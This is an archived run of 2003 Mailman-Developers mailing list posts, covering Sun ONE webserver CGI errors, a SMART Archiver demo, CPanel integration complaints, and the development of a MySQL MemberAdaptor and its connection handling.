From ihsan at dogan.ch Sun Nov 2 05:42:15 2003 From: ihsan at dogan.ch (Ihsan Dogan) Date: Sun Nov 2 11:43:49 2003 Subject: [Mailman-Developers] Mailman with Sun ONE Webserver Message-ID: <20031102104214.GA18747@defiant.kinali.ch> Hi, I installed Mailman 2.1.3 together with the Sun ONE Webserver 6.1 on Solaris 9. The web-interface works mostly fine, only several things are not working correctly. When I try to subscribe on a mailinglist, I got the following error (from the error log): [02/Nov/2003:11:34:09] failure ( 8211): for host defiant.kinali.ch trying to POST /mailman/subscribe/mailman, cgi_scan_headers reports: HTTP4044: the CGI program /opt/mailman/cgi-bin/subscribe did not produce a valid header (name without value: got line " file "/opt/mailman/mailman/logging/logger.py", line 67, in __get_f") Does somebody have an idea, what is going wrong here? Regards, Ihsan... -- Swiss Unix User Group: http://www.suug.ch/ Software Packages for Solaris: http://www.blastwave.org/ From gijs at gewis.nl Sun Nov 2 11:00:04 2003 From: gijs at gewis.nl (Gijs Hollestelle) Date: Sun Nov 2 11:43:50 2003 Subject: [Mailman-Developers] SMART Archiver Message-ID: <20031102170004.A15712@gewis.win.tue.nl> Hi all, A week ago PieterB told me that there might be an interest in a replacement archiver for pipermail that we created during a software engineering course. That is why i put together a small demo and a homepage for the SMART Archiver project. I have set up a demo by importing the last 3 months of (publicly available) mailman-developers archives into it. The site archive password (which allows anyone to login as an administrator and can not be changed using the web interface) is 'demo'. Note that this demo allows anyone to become administrator, so that anyone can see the admin interface and play with it but if anyone abuses this right i will remove the admin functions from the demo. The demo can be found at: http://gewis.nl/~gijs/cgi-bin/private And the homepage at: http://smartarchiver.sourceforge.net Features of the SMART Archiver: Features: * Gives a threaded overview of messages in a given time period. * Allows users to sort the archive by subject, date, thread, sender and attachment types. * Allows users to search the archive over the web. * Understands MIME attachments and allows searching in plain-text attachments. * Allows administrators to add, remove and edit both messages and attachments. * Integrates with mailman. * Allows users to download all messages in a specific overview in mbox format. * Can import messages from mbox format. * Can automaticly remove messages from the archive after a certain amount of time. Currently there are some known issues with the archiver, which should be worked out in the near future: * Webinterface does not support multiple pages (if you have an overview of a few months there could be a few thousand messages on your screen) * Currently requires the PostgreSQL database, there should also be support for MySQL and some simpler format that can be used without a 3rd party database. * The installer is very poor. Let me know what you all think, currently I am the only active developer on the project if anyone is interested in joining the project please let me know. -- Gijs Hollestelle gijs@gewis.nl From kmccann at bellanet.org Mon Nov 3 00:23:21 2003 From: kmccann at bellanet.org (Kevin McCann) Date: Mon Nov 3 00:07:12 2003 Subject: [Mailman-Developers] SMART Archiver References: <20031102170004.A15712@gewis.win.tue.nl> Message-ID: <01f401c3a1ca$993b1e40$0501a8c0@kevinduron> > A week ago PieterB told me that there might be an interest in a replacement > archiver for pipermail that we created during a software engineering course. > That is why i put together a small demo and a homepage for the SMART > Archiver project. Fantastic work! I'd be very interested in helping out with this project, particularly in the MySQL area. I'd really love for this to happen. What can I do to help? Contact me privately and maybe we can arrange for some specific tasks. - Kevin kmccann at bellanet.org From barry at python.org Mon Nov 3 08:51:51 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 3 08:51:56 2003 Subject: [Mailman-Developers] Re: [Mailman-Users] unsubscribe_policy problem? (fixed, includes a patch) In-Reply-To: References: Message-ID: <1067867511.5173.135.camel@anthem> On Thu, 2003-10-30 at 05:11, Pasi Sjoholm wrote: > anyone didn't reply to me so I fixed this by myself, here is the patch: Applied, with some modification, to CVS. It will be part of 2.1.4. Thanks, -Barry From wheakory at isu.edu Mon Nov 3 18:25:15 2003 From: wheakory at isu.edu (Kory Wheatley) Date: Mon Nov 3 18:25:34 2003 Subject: [Mailman-Developers] Newlist Automation script Message-ID: <3FA6E3DB.7060107@isu.edu> Question, has anyone developed an automation script that would create a new mailing list and subscribe users to it by reading a file. I need to develop a create that does the above process, where a mailing list and the owner is created by just reading the information provided in a file, (along with the users that need to be subscribed to the new list). This process would continually run in cron. I was planning on writing something, but I didn't know if someone else already have sometime that would save me some time. -- Kory Wheatley Academic Computing Analyst Sr. Phone 282-3874 ######################################### Everything must point to him. From wheakory at isu.edu Mon Nov 3 19:09:53 2003 From: wheakory at isu.edu (Kory Wheatley) Date: Mon Nov 3 19:09:55 2003 Subject: [Mailman-Developers] Newlist Automation scripts Message-ID: <3FA6EE51.2000302@isu.edu> I left out some details from my last message about creating a list automatically from a file with no manual process involved. I'm running Mailman 2..1.2 on RED HAT 9 using postfix. I've setup postfix to automatically add the new mailing lists attributes to be configured in the alias file with the instruction provided in the install of mailman 2.0, so that portion is already accomplished for automation. I just need the rest automated. -- Kory Wheatley Academic Computing Analyst Sr. Phone 282-3874 ######################################### Everything must point to him. From brad.knowles at skynet.be Mon Nov 3 21:57:41 2003 From: brad.knowles at skynet.be (Brad Knowles) Date: Mon Nov 3 22:16:01 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: References: Message-ID: At 12:05 PM -0400 2003/10/21, wrote: > Can we get a mailing list set up to address and escalate mailman <-> cpanel > issues? Get someone from CPanel to actually care about the problems and contact the appropriate people over here, and I'm sure that could easily be done. But first, someone over there has to actually care. -- Brad Knowles, "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, Historical Review of Pennsylvania. GCS/IT d+(-) s:+(++)>: a C++(+++)$ UMBSHI++++$ P+>++ L+ !E-(---) W+++(--) N+ !w--- O- M++ V PS++(+++) PE- Y+(++) PGP>+++ t+(+++) 5++(+++) X++(+++) R+(+++) tv+(+++) b+(++++) DI+(++++) D+(++) G+(++++) e++>++++ h--- r---(+++)* z(+++) From barry at python.org Mon Nov 3 23:38:45 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 3 23:38:53 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: References: Message-ID: <1067920725.5173.411.camel@anthem> On Tue, 2003-10-21 at 12:05, Martin@Cleaver.org wrote: > I am particularly concerned about > http://forums.cpanel.net/showthread.php?s=&threadid=15928 but from the > mailman-users@python.org list there are definitely a whole host of issues > that the mailman-developers would address if we had the correct > communication in place. I had some contact from the CPanel folks a while back, and I've just added a FAQwizard entry with the contact information they provided: http://www.python.org/cgi-bin/faqw-mm.py?req=all#6.11 Sounds like you've already contacted them at their forums. I can't read that thread because it requires a login and I don't have the time or desire to register with their site. As always I'm willing to work with the CPanel folks if they can identify bugs in Mailman, but the initiative has to come from there side. Without that, I'd have no idea where to even start. -Barry From barry at python.org Mon Nov 3 23:43:26 2003 From: barry at python.org (Barry Warsaw) Date: Mon Nov 3 23:43:33 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <1067920725.5173.411.camel@anthem> References: <1067920725.5173.411.camel@anthem> Message-ID: <1067921005.5173.413.camel@anthem> On Mon, 2003-11-03 at 23:38, Barry Warsaw wrote: > As always I'm willing to work with the CPanel folks if they can identify > bugs in Mailman, but the initiative has to come from there side. > Without that, I'd have no idea where to even start. s/there/their/ -Barry From barry at python.org Tue Nov 4 11:03:40 2003 From: barry at python.org (Barry Warsaw) Date: Tue Nov 4 11:03:50 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <1067961070.32332.17.camel@localhost.localdomain> References: <1067920725.5173.411.camel@anthem> <1067961070.32332.17.camel@localhost.localdomain> Message-ID: <1067961819.26825.54.camel@anthem> On Tue, 2003-11-04 at 10:51, J. Nick Koston wrote: > The only problem that I've seen so far that I haven't track down to user > error is mailman telling someone that their post has been rejected even > though they are subscribed to the list and allowed to post. I still > haven't been able to track down this one yet, or verify it as legit. As > soon as I do I will let you know. Cool, thanks Nick. -Barry From jp_mailman at gcfl.net Mon Nov 3 17:05:53 2003 From: jp_mailman at gcfl.net (jp_mailman@gcfl.net) Date: Tue Nov 4 11:04:22 2003 Subject: [Mailman-Developers] Automatic delivery off/on for vacation? Message-ID: <20031103220553.GB12614@gcfl.net> Is there any plans to have a way for subscribers to automatically turn off, and then on, the delivery of a mailing list (for example when going on vacation)? Probably require parsing a start and stop date, or a start date and number of days to hold email. Thanx. -- Give your child mental blocks for Christmas. www.GCFL.net (The Good, Clean Funnies List): Good, clean funnies five times a week, no ads, for f_r_e_e! From nick at cpanel.net Tue Nov 4 10:51:10 2003 From: nick at cpanel.net (J. Nick Koston) Date: Tue Nov 4 11:04:24 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <1067920725.5173.411.camel@anthem> References: <1067920725.5173.411.camel@anthem> Message-ID: <1067961070.32332.17.camel@localhost.localdomain> The only problem that I've seen so far that I haven't track down to user error is mailman telling someone that their post has been rejected even though they are subscribed to the list and allowed to post. I still haven't been able to track down this one yet, or verify it as legit. As soon as I do I will let you know. Thanks /Nick On Mon, 2003-11-03 at 23:38, Barry Warsaw wrote: > On Tue, 2003-10-21 at 12:05, Martin@Cleaver.org wrote: > > > I am particularly concerned about > > http://forums.cpanel.net/showthread.php?s=&threadid=15928 but from the > > mailman-users@python.org list there are definitely a whole host of issues > > that the mailman-developers would address if we had the correct > > communication in place. > > I had some contact from the CPanel folks a while back, and I've just > added a FAQwizard entry with the contact information they provided: > > http://www.python.org/cgi-bin/faqw-mm.py?req=all#6.11 > > Sounds like you've already contacted them at their forums. I can't read > that thread because it requires a login and I don't have the time or > desire to register with their site. > > As always I'm willing to work with the CPanel folks if they can identify > bugs in Mailman, but the initiative has to come from there side. > Without that, I'd have no idea where to even start. > > -Barry > > > > From kyrian-list at ore.org Tue Nov 4 10:27:45 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Tue Nov 4 11:04:27 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor? In-Reply-To: References: Message-ID: <20031104152745.480bcbee.kyrian-list@ore.org> Hi All, I'm presuming this is the appropriate list to post this to... If anyone cares, I've written a Mysql MemberAdaptor based on the OldStyleMemberships.py module, which seems to work ok. I've not done much large scale testing as yet, though. I've put it up at http://kyrian.ore.org/MailmanMysql/ Although I could use some pointers on the following: - How to incorporate exception handling in python to trap DB errors, and stop Mailman choking on them. - How to incorporate some better configuration (you currently would have to edit the module file directly to specify the database parameters) - How to properly incorporate it into mailman (if nobody minds that ;), as it currently seems to require modifying MemberAdaptor.py directly to activate it. - Whether I've actually done it even half way right? Either way, if anyone has anything to say about it, please go easy, I kinda needed this thing, and delved into Python for the first time to do so. Oh, and I know the MySQL data structure I'm using is pretty atrocious, as it was a best-guess, though I can always clean it up later... I do hope I've not just spent several days reinventing the wheel here, though... ;*) Yours, Kev. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From kyrian-list at ore.org Tue Nov 4 13:04:16 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Tue Nov 4 13:04:26 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? Message-ID: <20031104180416.40dec963.kyrian-list@ore.org> Further to my previous message, I've now got it reading config from mm_cfg.py, verifying the connectivity to the mysql database on the __init__ call, rather than throwing up(numerous) errors later on, updated the README to reflect relevant changes, and just generally cleaned things up a bit. That's RCS revision 1.13. The only major problem I have is the return types for {get,set}DeliveryStatus. I can't work out how I'm suppose to return a tuple of values, and what they should be. If someone could assist I'd be grateful :-) K. Begin forwarded message: Date: Tue, 4 Nov 2003 15:27:45 +0000 From: Kyrian (List) To: mailman-developers@python.org Subject: Mysql MemberAdaptor? Hi All, I'm presuming this is the appropriate list to post this to... If anyone cares, I've written a Mysql MemberAdaptor based on the OldStyleMemberships.py module, which seems to work ok. I've not done much large scale testing as yet, though. I've put it up at http://kyrian.ore.org/MailmanMysql/ Although I could use some pointers on the following: - How to incorporate exception handling in python to trap DB errors, and stop Mailman choking on them. - How to incorporate some better configuration (you currently would have to edit the module file directly to specify the database parameters) - How to properly incorporate it into mailman (if nobody minds that ;), as it currently seems to require modifying MemberAdaptor.py directly to activate it. - Whether I've actually done it even half way right? Either way, if anyone has anything to say about it, please go easy, I kinda needed this thing, and delved into Python for the first time to do so. Oh, and I know the MySQL data structure I'm using is pretty atrocious, as it was a best-guess, though I can always clean it up later... I do hope I've not just spent several days reinventing the wheel here, though... ;*) Yours, Kev. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/-- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From kyrian-list at ore.org Wed Nov 5 06:11:40 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Wed Nov 5 06:12:00 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> Message-ID: <20031105111140.51f91153.kyrian-list@ore.org> On Wed, 5 Nov 2003 16:31:51 +0800 "Yuan, Cain" wrote: > Hi Kev, > I had a look at the patch and have some questions here: why you > establish a connection to MySQL and then close it in each > function? AFAIK this will put much presure on MySQL if there > are some people to subscribe/unscribe from the list. Why not > just establish a ststic link to MySQL and then use it every time > you need to access the DB? > Seemed like a good idea at the time ;*) But seriously, doing it that way means I don't really have to worry about connection timeouts, etc. Maybe it can be rewritten later to work differently (like when I learn to write better python ;*), but for the most part, it will work now. I have cut down the number of connect() calls a little already though, but not as far as perhaps I could go. I've updated the whole thing a lot since both of those emails last night. The remaining problems, though, are that I still haven't cracked {get,set}DeliveryStatus(for the reasons previously detailed), and{get,set}BounceInfo, which is another problem. In the MySQL database I end up with the following string: -----Original Message----- > From: mailman-developers-bounces+cain.yuan=intel.com@python.org > [mailto:mailman-developers-bounces+cain.yuan=intel.com@python.org]On > Behalf Of Kyrian (List) Sent: Wednesday, November 05, 2003 2:04 AM > To: mailman-developers@python.org > Subject: [Mailman-Developers] More on Mysql MemberAdaptor? > > > Further to my previous message, I've now got it reading config from > mm_cfg.py, verifying the connectivity to the mysql database on the > __init__ call, rather than throwing up(numerous) errors later on, > updated the README to reflect relevant changes, and just generally > cleaned things up a bit. That's RCS revision 1.13. > > The only major problem I have is the return types for > {get,set}DeliveryStatus. I can't work out how I'm suppose to return a > tuple of values, and what they should be. > > If someone could assist I'd be grateful :-) > > K. > > Begin forwarded message: > > Date: Tue, 4 Nov 2003 15:27:45 +0000 > From: Kyrian (List) > To: mailman-developers@python.org > Subject: Mysql MemberAdaptor? > > > Hi All, > > I'm presuming this is the appropriate list to post this to... > > If anyone cares, I've written a Mysql MemberAdaptor based on the > OldStyleMemberships.py module, which seems to work ok. I've not done > much large scale testing as yet, though. > > I've put it up at http://kyrian.ore.org/MailmanMysql/ > > Although I could use some pointers on the following: > > - How to incorporate exception handling in python to trap DB errors, > and stop Mailman choking on them. > > - How to incorporate some better configuration (you currently would > have to edit the module file directly to specify the database > parameters) > > - How to properly incorporate it into mailman (if nobody minds that > ;), as it currently seems to require modifying MemberAdaptor.py > directly to activate it. > > - Whether I've actually done it even half way right? > > Either way, if anyone has anything to say about it, please go easy, I > kinda needed this thing, and delved into Python for the first time to > do so. > > Oh, and I know the MySQL data structure I'm using is pretty atrocious, > as it was a best-guess, though I can always clean it up later... > > I do hope I've not just spent several days reinventing the wheel here, > though... ;*) > > Yours, > > Kev. > > -- > Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & > Ted. > Email: kyrian@ore.org Web: http://kyrian.ore.org/ > ISP/Perl/PHP/Linux/Security Contractor, via > http://www.orenet.co.uk/-- > Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & > Ted. > Email: kyrian@ore.org Web: http://kyrian.ore.org/ > ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ > > _______________________________________________ > Mailman-Developers mailing list > Mailman-Developers@python.org > http://mail.python.org/mailman/listinfo/mailman-developers -- Kev Green, aka Kyrian. E: kyrian@ore.org WWW: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ "A superficial episode, as life continues to unfold" -- Bad Religion -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From Martin at Cleaver.org Wed Nov 5 08:40:01 2003 From: Martin at Cleaver.org (Martin@Cleaver.org) Date: Wed Nov 5 08:40:32 2003 Subject: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? In-Reply-To: <1067961070.32332.17.camel@localhost.localdomain> Message-ID: Actually, that's not my main complaint. My main complaint is that the archives don't work with HTML postings rendering the mailing list practically useless. Here's a typical mailing: http://cp1.myhostdns.org/pipermail/social-announce-ft2004_mbssrc.com/2003-No vember/date.html Here's my postings to the cpanel site: * http://forums.cpanel.net/showthread.php?s=&threadid=15928 And I am not alone: * http://forums.cpanel.net/showthread.php?s=&threadid=13383 Can you please advise? Thanks, Martin. -- Martin@Cleaver.org - +1 416 832 7759 Melbourne Business School FT 2004 MBA Exchange Participant to Rotman =-----Original Message----- =From: J. Nick Koston [mailto:nick@cpanel.net] =Sent: Tuesday, 4 November 2003 10:51 AM =To: Barry Warsaw =Cc: Martin@Cleaver.org; mailman-developers@python.org =Subject: Re: [Mailman-Developers] RE: [Mailman-Users] Mailman & CPanel? = = =The only problem that I've seen so far that I haven't track =down to user error is mailman telling someone that their post =has been rejected even though they are subscribed to the list =and allowed to post. I still haven't been able to track down =this one yet, or verify it as legit. As soon as I do I will =let you know. = =Thanks =/Nick = =On Mon, 2003-11-03 at 23:38, Barry Warsaw wrote: => On Tue, 2003-10-21 at 12:05, Martin@Cleaver.org wrote: => => > I am particularly concerned about => > http://forums.cpanel.net/showthread.php?s=&threadid=15928 but from => > the mailman-users@python.org list there are definitely a =whole host => > of issues that the mailman-developers would address if we had the => > correct communication in place. => => I had some contact from the CPanel folks a while back, and I've just => added a FAQwizard entry with the contact information they provided: => => http://www.python.org/cgi-bin/faqw-mm.py?req=all#6.11 => => Sounds like you've already contacted them at their forums. I can't => read that thread because it requires a login and I don't =have the time => or desire to register with their site. => => As always I'm willing to work with the CPanel folks if they can => identify bugs in Mailman, but the initiative has to come from there => side. Without that, I'd have no idea where to even start. => => -Barry => => => => = From rcm at sasaska.net Thu Nov 6 15:26:13 2003 From: rcm at sasaska.net (Rafael Cordones Marcos) Date: Thu Nov 6 15:26:20 2003 Subject: [Mailman-Developers] Re: Requirements for a new archiver In-Reply-To: <1067376029.16085.252.camel@localhost.localdomain> References: <3F9D08F9.6090209@student.umist.ac.uk> <20031028203036.GH5392@dust.uchicago.edu> <1067376029.16085.252.camel@localhost.localdomain> Message-ID: <200311062126.13633.rcm@sasaska.net> El Martes, 28 de Octubre de 2003 22:20, Kevin McCann escribi?: > > That's pretty much the ideological basis for what I have done. We have > > message-delivery protocols, and tools that know about messages; why keep > > trying to reinvent them over HTTP? > > There is a huge demand for web applications that use mailing list data. > Mailing list archives in easily accessibly databases will lead to killer > community-building apps that *build* on the mailing list archives but > offer other resources. > > NNTP access is fine, go ahead. And IMAP all you want. But I really hope > that the Mailman development community does not dismiss the *very strong > desire* for flexible web scripting access to the goods. As far as I'm Pardon my ignorance, what do you mean by "flexible web scripting access"? Could you elaborate further? I am currently involved in a project which consists on adding cross-lingual capabilities to a mailing list manager[1] which to a great extend has to do with the *content* of the e-mails posted to the list. [1] CroMaLiM: A Crosslingual Mailing List Manager: http://www.sasaska.net/cromalim/index.html Thanks a lot for your time! /Rafa > concerned, this is the only thing that's really holding Mailman back > from being the tour de force product that it could be. > > I feel like I'm beating a dead horse, and I apologize if I'm being a > pain-in-the-ass with this, but I think it's important. > > - Kevin > > > > > > > _______________________________________________ > Mailman-Developers mailing list > Mailman-Developers@python.org > http://mail.python.org/mailman/listinfo/mailman-developers -- Rafael Cordones Marcos rcm@sasaska.net http://www.sasaska.net From kyrian-list at ore.org Fri Nov 7 08:11:40 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Fri Nov 7 08:11:50 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? In-Reply-To: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> Message-ID: <20031107131140.2b897534.kyrian-list@ore.org> On Wed, 5 Nov 2003 16:31:51 +0800 "Yuan, Cain" wrote: > Hi Kev, > I had a look at the patch and have some questions here: why you > establish a connection to MySQL and then close it in each > function? AFAIK this will put much presure on MySQL if there > are some people to subscribe/unscribe from the list. Why not > just establish a ststic link to MySQL and then use it every time > you need to access the DB? > > Cain Gah! Just running a very big test of this thing, and it seems you're *very* right. By the looks of it, Mailman loads in all of the delivery_status and digest information before it even sends the first mail. Given that, the performance penalty of all those connect/cursor/etc. calls is horrendous, and I need to rethink a little. On the good side, though, I *think* I've got the get/setBounceInfo functions working now, but I've had to import the _BounceInfo class in order to create the appropriate object instance to make it work. Don't know if that's going to be a problem... Current Versionisms: MysqlMemberships.py: 1.24 MysqlMemberships.py.README: 1.15 MysqlMemberships.py.TODO: 1.6 Pondering whether to send a message to mailman-users about this thing, or not. I don't like the prospect of my server getting slashdotted though :( K. -- Kev Green, aka Kyrian. E: kyrian@ore.org WWW: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ "Love is that condition in which the happiness of another person is essential to your own." R. Heinlein, Stranger in a Strange Land, 1961. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From cain.yuan at intel.com Wed Nov 5 03:31:51 2003 From: cain.yuan at intel.com (Yuan, Cain) Date: Fri Nov 7 09:42:40 2003 Subject: [Mailman-Developers] More on Mysql MemberAdaptor? Message-ID: <37FBBA5F3A361C41AB7CE44558C3448E01167B73@pdsmsx403.ccr.corp.intel.com> Hi Kev, I had a look at the patch and have some questions here: why you establish a connection to MySQL and then close it in each function? AFAIK this will put much presure on MySQL if there are some people to subscribe/unscribe from the list. Why not just establish a ststic link to MySQL and then use it every time you need to access the DB? Cain -----Original Message----- From: mailman-developers-bounces+cain.yuan=intel.com@python.org [mailto:mailman-developers-bounces+cain.yuan=intel.com@python.org]On Behalf Of Kyrian (List) Sent: Wednesday, November 05, 2003 2:04 AM To: mailman-developers@python.org Subject: [Mailman-Developers] More on Mysql MemberAdaptor? Further to my previous message, I've now got it reading config from mm_cfg.py, verifying the connectivity to the mysql database on the __init__ call, rather than throwing up(numerous) errors later on, updated the README to reflect relevant changes, and just generally cleaned things up a bit. That's RCS revision 1.13. The only major problem I have is the return types for {get,set}DeliveryStatus. I can't work out how I'm suppose to return a tuple of values, and what they should be. If someone could assist I'd be grateful :-) K. Begin forwarded message: Date: Tue, 4 Nov 2003 15:27:45 +0000 From: Kyrian (List) To: mailman-developers@python.org Subject: Mysql MemberAdaptor? Hi All, I'm presuming this is the appropriate list to post this to... If anyone cares, I've written a Mysql MemberAdaptor based on the OldStyleMemberships.py module, which seems to work ok. I've not done much large scale testing as yet, though. I've put it up at http://kyrian.ore.org/MailmanMysql/ Although I could use some pointers on the following: - How to incorporate exception handling in python to trap DB errors, and stop Mailman choking on them. - How to incorporate some better configuration (you currently would have to edit the module file directly to specify the database parameters) - How to properly incorporate it into mailman (if nobody minds that ;), as it currently seems to require modifying MemberAdaptor.py directly to activate it. - Whether I've actually done it even half way right? Either way, if anyone has anything to say about it, please go easy, I kinda needed this thing, and delved into Python for the first time to do so. Oh, and I know the MySQL data structure I'm using is pretty atrocious, as it was a best-guess, though I can always clean it up later... I do hope I've not just spent several days reinventing the wheel here, though... ;*) Yours, Kev. -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/-- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ _______________________________________________ Mailman-Developers mailing list Mailman-Developers@python.org http://mail.python.org/mailman/listinfo/mailman-developers From kyrian-list at ore.org Fri Nov 7 12:39:39 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Fri Nov 7 12:39:49 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 In-Reply-To: References: Message-ID: <20031107173939.694eb492.kyrian-list@ore.org> > Hi Kev, > I had a look at the patch and have some questions here: why you > establish a connection to MySQL and then close it in each > function? AFAIK this will put much presure on MySQL if there > are some people to subscribe/unscribe from the list. Why not > just establish a ststic link to MySQL and then use it every time > you need to access the DB? > > Cain In response to this, and the atrocious performance that I just observed sending to a 60,000 or so member list, I've implemented a connection sharing system in v1.27. I've removed all the explicit connect/cursor calls, and now they're implemented by a connect on __init() and subsequently by a single function; prodServerConnection() which does a ping() against the server(which the MySQL docs say should do an automatic reconnect if possible), checks for errors, if the ping() fails, tries a full disconnect and reconnect, trapping any errors that occur. If that fails, it drops out. This hasn't been thoroughly tested yet, but it should work I think. I still need a little help with the bounce_info and delivery_status flags, though, as they don't seem to be working, in spite of what Mailman is logging(*), the database isn't being updated. K. *) Lots of these, but the database isn't being updated properly... Nov 07 17:25:14 2003 (6195) XYZ@MYDOMAIN.co.uk: test current bounce score: 1.0 -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ From cain.yuan at intel.com Fri Nov 7 15:29:20 2003 From: cain.yuan at intel.com (Yuan, Cain) Date: Fri Nov 7 15:29:33 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 Message-ID: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> Hi Kev, It's very cool to do a ping() before using those connections. One more question here: where are you planning to add the code for close those connections when mailman is ready to quit (sometimes we need to shutdown mailman manually and of cause we did not want to leave those connection in the system)? Python has a __init() but seems no __exit functions( correct me if I am wrong). Regards, Cain -----Original Message----- From: mailman-developers-bounces+cain.yuan=intel.com@python.org [mailto:mailman-developers-bounces+cain.yuan=intel.com@python.org]On Behalf Of Kyrian (List) Sent: Saturday, November 08, 2003 1:40 AM To: mailman-developers@python.org Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 > Hi Kev, > I had a look at the patch and have some questions here: why you > establish a connection to MySQL and then close it in each > function? AFAIK this will put much presure on MySQL if there > are some people to subscribe/unscribe from the list. Why not > just establish a ststic link to MySQL and then use it every time > you need to access the DB? > > Cain In response to this, and the atrocious performance that I just observed sending to a 60,000 or so member list, I've implemented a connection sharing system in v1.27. I've removed all the explicit connect/cursor calls, and now they're implemented by a connect on __init() and subsequently by a single function; prodServerConnection() which does a ping() against the server(which the MySQL docs say should do an automatic reconnect if possible), checks for errors, if the ping() fails, tries a full disconnect and reconnect, trapping any errors that occur. If that fails, it drops out. This hasn't been thoroughly tested yet, but it should work I think. I still need a little help with the bounce_info and delivery_status flags, though, as they don't seem to be working, in spite of what Mailman is logging(*), the database isn't being updated. K. *) Lots of these, but the database isn't being updated properly... Nov 07 17:25:14 2003 (6195) XYZ@MYDOMAIN.co.uk: test current bounce score: 1.0 -- Kev Green, aka Kyrian. "Be excellent to each other" -- Bill & Ted. Email: kyrian@ore.org Web: http://kyrian.ore.org/ ISP/Perl/PHP/Linux/Security Contractor, via http://www.orenet.co.uk/ _______________________________________________ Mailman-Developers mailing list Mailman-Developers@python.org http://mail.python.org/mailman/listinfo/mailman-developers From kyrian-list at ore.org Sat Nov 8 07:02:36 2003 From: kyrian-list at ore.org (Kyrian (List)) Date: Sat Nov 8 07:02:48 2003 Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 In-Reply-To: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> References: <37FBBA5F3A361C41AB7CE44558C3448E01167B7B@pdsmsx403.ccr.corp.intel.com> Message-ID: <20031108120236.475edc80.kyrian-list@ore.org> All, I was planning to, but I couldn't work out where to put it either. More research (or another API hook in mailman?) will be required methinks... In theory MySQL should time them out after a while, but that's a bit of an unacceptable risk, really, since people might have lists that regularly get mailed to, and hence call the __init function, thus connection-flooding MySQL and causing it all to break down and go to hell. I also found a stupid bug in the Mysql bounce handling(again) which I've fixed and uploaded. The guy using this thing was supposed to give me a heads-up before using it on his list this morning, but didn't, so I can only assume it's all been going okay so far, since he didn't complain at me about it not working... ;-) K. On Sat, 8 Nov 2003 04:29:20 +0800 "Yuan, Cain" wrote: > Hi Kev, > It's very cool to do a ping() before using those connections. > One more question here: where are you planning to add the code > for close those connections when mailman is ready to quit > (sometimes we need to shutdown mailman manually and of cause we > did not want to leave those connection in the system)? Python > has a __init() but seems no __exit functions( correct me if I > am wrong). > > Regards, > > Cain > > > -----Original Message----- > From: mailman-developers-bounces+cain.yuan=intel.com@python.org > [mailto:mailman-developers-bounces+cain.yuan=intel.com@python.org]On > Behalf Of Kyrian (List) Sent: Saturday, November 08, 2003 1:40 AM > To: mailman-developers@python.org > Subject: [Mailman-Developers] Mysql MemberAdaptor, v1.27 > > > > > Hi 